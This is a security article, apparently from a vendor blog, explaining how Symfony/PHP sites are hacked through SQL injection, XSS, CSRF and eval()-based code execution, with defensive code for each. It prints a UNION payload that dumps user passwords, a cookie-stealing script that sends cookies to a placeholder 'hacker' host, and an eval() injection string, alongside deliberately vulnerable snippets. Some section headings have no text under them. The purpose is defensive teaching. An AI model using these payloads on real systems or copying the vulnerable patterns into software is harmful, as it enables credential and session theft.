
Symfony Website Hacked – Symptoms, Causes & Fixes

Symfony is a popular PHP framework that makes it easy to build PHP websites and web applications. In the past, Drupal has been affected by flaws in the Symfony framework, and those flaws ultimately led to Symfony websites being hacked. Though the framework itself was at fault in those cases, unsafe development practices also make your PHP website vulnerable. This article covers the critical vulnerabilities that can lead to a Symfony website being hacked and how to prevent them.

The popularity of Symfony can be attributed to the set of decoupled and reusable PHP libraries it provides. These libraries speed up development and make it easier altogether. However, using the Symfony framework alone cannot secure your PHP website. According to data from Contrast Security,

The average application is 79% library code, and only 21% custom code. Just over 76% of applications contain at least one vulnerability, and 34% contain four or more vulnerabilities. These are shocking failures of the software supply chain.


Symfony Website Hacked: Symptoms

Causes of a Hacked Symfony Website

Symfony Website Hacked: SQL Injection

Symfony SQL injection is a type of attack that targets the database of your site. A lack of user input sanitization makes the site vulnerable, which then leads to the Symfony website being hacked. For example, look at the code given below:

<?php
// $size comes straight from the request and is interpolated into the SQL text
$query  = "SELECT id, name, inserted, size FROM products WHERE size = '$size'";
$result = odbc_exec($conn, $query);
?>

This looks like simple PHP code to execute an SQL query, but because $size is placed directly into the query string, an attacker can use it to reveal all the passwords from the database with a SELECT statement of their own. The input provided to the $size variable would look something like:

'union select '1', concat(uname||'-'||passwd) as name, '1971-01-01', '0' from user;--

When executed, this statement lists every password from the table named user. The -- at the end turns the rest of the SQL on that line into a comment, so the original closing quote causes no syntax error. This is just a small example; attackers can use SQL injection in various ways to read, edit and even delete your database. In some Symfony website hacked cases, SQLi has also been used to obtain a reverse shell.
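As an added example (not code from the original post), here is the products lookup rewritten with a prepared statement, first for the odbc_* functions the snippet uses and then for Doctrine DBAL as a Symfony project would normally have it; $conn and $dbal are assumed to be open connections.

```php
<?php
// Added example: the value of $size is bound as a parameter, so the database
// receives it as data and never parses it as part of the SQL statement.
// $conn is assumed to be an open odbc_connect() handle.
function findProductsBySize($conn, string $size): array
{
    // The ? placeholder replaces the interpolated '$size' of the vulnerable query.
    $stmt = odbc_prepare($conn, 'SELECT id, name, inserted, size FROM products WHERE size = ?');
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . odbc_errormsg($conn));
    }
    // The parameter travels separately from the statement text; a payload such as
    // "' union select ..." is just a string that matches no product size.
    if (!odbc_execute($stmt, [$size])) {
        throw new RuntimeException('execute failed: ' . odbc_errormsg($conn));
    }
    $rows = [];
    while ($row = odbc_fetch_array($stmt)) {
        $rows[] = $row;
    }
    return $rows;
}

// Doctrine DBAL equivalent with a named parameter (DBAL 2.11+ / 3.x API).
// $dbal is assumed to be a Doctrine\DBAL\Connection.
function findProductsBySizeDbal(\Doctrine\DBAL\Connection $dbal, string $size): array
{
    return $dbal->fetchAllAssociative(
        'SELECT id, name, inserted, size FROM products WHERE size = :size',
        ['size' => $size]
    );
}
```

If the set of valid sizes is known (for example S, M, L), validating $size against that allowlist before the query gives a second, independent layer.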


Symfony Website Hacked: Cross-Site Scripting

XSS is a widely found vulnerability that occurs due to lack of proper user input sanitization. This vulnerability is commonly found in search boxes, message boards, etc. A Symfony website hacked due to XSS can be used by the attacker to steal cookies and thus take over the session. For example, crafting a search query with the following code can allow an attacker to steal the cookies of whosoever clicks on it.

"><SCRIPT>var+img=new+Image();img.src="http://hacker/"%20+%20document.cookie;</SCRIPT>

Here the "> sequence closes the attribute value and the previous tag. Thereafter, the Image() constructor creates a new image in the variable img. The next statement sets the source of the image, and in the same statement document.cookie is appended to the attacker's URL, so the browser sends the cookie to the attacker's server and it can be used for session takeover.


If the XSS is stored (persistent), it is even more dangerous, because the script steals cookies automatically whenever someone opens the infected page, whereas reflected XSS relies on social engineering to get a victim to click the crafted link. Beyond cookie theft, a Symfony website hacked through XSS can also be used for all kinds of phishing attacks!
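Added example, not from the original post: the two controls that neutralise the payload above, output encoding of the reflected search term and HttpOnly/SameSite flags on the session cookie; the function names e(), renderSearchBox() and hardenSessionCookie() are my own.

```php
<?php
// Added example: output encoding plus cookie flags against the cookie-stealing payload.

// 1. Encode every value before it lands in HTML. ENT_QUOTES also escapes the
//    double quote the payload uses to break out of the value="..." attribute.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Echoing the search term back into the results page (the common reflected case).
function renderSearchBox(string $query): string
{
    return '<input type="text" name="q" value="' . e($query) . '">'
         . '<p>Results for: ' . e($query) . '</p>';
}
// In a Symfony Twig template the same output is {{ query }}: autoescaping is on
// by default and only the |raw filter switches it off, so treat |raw as a review finding.

// 2. Session cookie flags, to be called before session_start(). In Symfony the
//    same settings are framework.session.cookie_httponly / cookie_samesite.
function hardenSessionCookie(): void
{
    session_set_cookie_params([
        'httponly' => true,   // document.cookie cannot read it, even if a script runs
        'secure'   => true,   // only sent over HTTPS
        'samesite' => 'Lax',  // not attached to cross-site POSTs (also limits CSRF)
        'path'     => '/',
    ]);
}

// Constructed input: the payload from the post, as an attacker would submit it.
$payload = '"><SCRIPT>var img=new Image();img.src="http://hacker/" + document.cookie;</SCRIPT>';
// The output contains &quot;&gt;&lt;SCRIPT&gt;... as inert text and no live <SCRIPT> element.
echo renderSearchBox($payload);
```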


Symfony Website Hacked: Cross-Site Request Forgery

CSRF can be used by attackers to make your logged-in users perform unwanted actions such as deleting their account or modifying their data. For example, when a user is logged into your site, visiting a specially crafted page like the one given below can result in the deletion of the account.
This page submits the 'delete' value of the action parameter to delete the user account. Although the attacker can use CSRF to carry out various actions, there is no mechanism for them to see whether the requests were successfully executed.
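Added example, not from the original post: a delete-account handler that refuses the forged request, using a per-action token stored in the session and a POST-only check; deleteCurrentUser() is a hypothetical placeholder for the real deletion.

```php
<?php
// Added example: the delete action only runs for a POST that carries a token
// bound to the victim's own session, which a cross-site page cannot obtain.
session_start();

function csrfToken(string $action): string
{
    // One random token per action, kept server-side in the session.
    if (empty($_SESSION['csrf'][$action])) {
        $_SESSION['csrf'][$action] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf'][$action];
}

function checkCsrfToken(string $action, ?string $submitted): bool
{
    $expected = $_SESSION['csrf'][$action] ?? null;
    // hash_equals compares in constant time; a missing token is rejected outright.
    return $expected !== null && $submitted !== null && hash_equals($expected, $submitted);
}

// The form the legitimate page renders: the token travels as a hidden field.
// Symfony Forms add this field automatically, and controllers can call
// $this->isCsrfTokenValid($id, $token) instead of checkCsrfToken().
function renderDeleteForm(): string
{
    return '<form method="post" action="/account">'
         . '<input type="hidden" name="action" value="delete">'
         . '<input type="hidden" name="_token" value="'
         . htmlspecialchars(csrfToken('delete-account'), ENT_QUOTES) . '">'
         . '<button>Delete my account</button></form>';
}

// The handler: a GET with ?action=delete, or a POST from another origin without
// the token, is refused before anything is touched.
function handleAccountRequest(string $method, array $post): string
{
    if ($method !== 'POST') {
        return '405 Method Not Allowed';
    }
    if (($post['action'] ?? '') !== 'delete') {
        return '400 Bad Request';
    }
    if (!checkCsrfToken('delete-account', $post['_token'] ?? null)) {
        return '403 Forbidden: invalid CSRF token';
    }
    // deleteCurrentUser();  // hypothetical placeholder for the real deletion
    return '200 account deleted';
}
```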

Symfony Website Hacked: Remote Code Execution

Remote code execution occurs in websites using Symfony because of poor coding standards. The root security issue in all of the attacks above is trusting user input. For instance, poor use of the eval() function in PHP code would look like this:

// $x is taken straight from the query string with no validation
$myvar = "varname";
$x = $_GET['arg'];
// user-controlled data is handed to eval()
eval("\$myvar = \$x;");

This seems like simple code: it takes the argument and uses the eval() function to execute the string as PHP code. But since the input is not filtered, an attacker can supply a value such as /index.php?arg=1; phpinfo(), which would lead to execution of the phpinfo() function.
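Added example, not from the original post: the same request handling without eval(), where each parameter name comes from a fixed allowlist and each value must pass a type check; ALLOWED_ARGS and readArgs() are names I made up for this example.

```php
<?php
// Added example: no string from the request is ever parsed as PHP code. The
// parameter name must be in the allowlist and the value must pass its validator.
const ALLOWED_ARGS = [
    'page' => FILTER_VALIDATE_INT,
    'sort' => ['options' => ['regexp' => '/^(name|price|date)$/']],
];

function readArgs(array $get): array
{
    $out = [];
    foreach (ALLOWED_ARGS as $name => $rule) {
        if (!array_key_exists($name, $get)) {
            continue;   // unknown or absent parameters are simply ignored
        }
        $value = is_int($rule)
            ? filter_var($get[$name], $rule)
            : filter_var($get[$name], FILTER_VALIDATE_REGEXP, $rule);
        if ($value === false) {
            throw new InvalidArgumentException("Invalid value for $name");
        }
        $out[$name] = $value;   // plain assignment, no eval()
    }
    return $out;
}

// Constructed input modelled on the payload from the post: rejected, never evaluated.
try {
    readArgs(['page' => '1; phpinfo()']);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";   // Invalid value for page
}
// Well-formed input is accepted as typed values: ['page' => 2, 'sort' => 'price']
print_r(readArgs(['page' => '2', 'sort' => 'price', 'arg' => 'ignored']));
```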

Symfony Website Hacked: Safe Development Practices
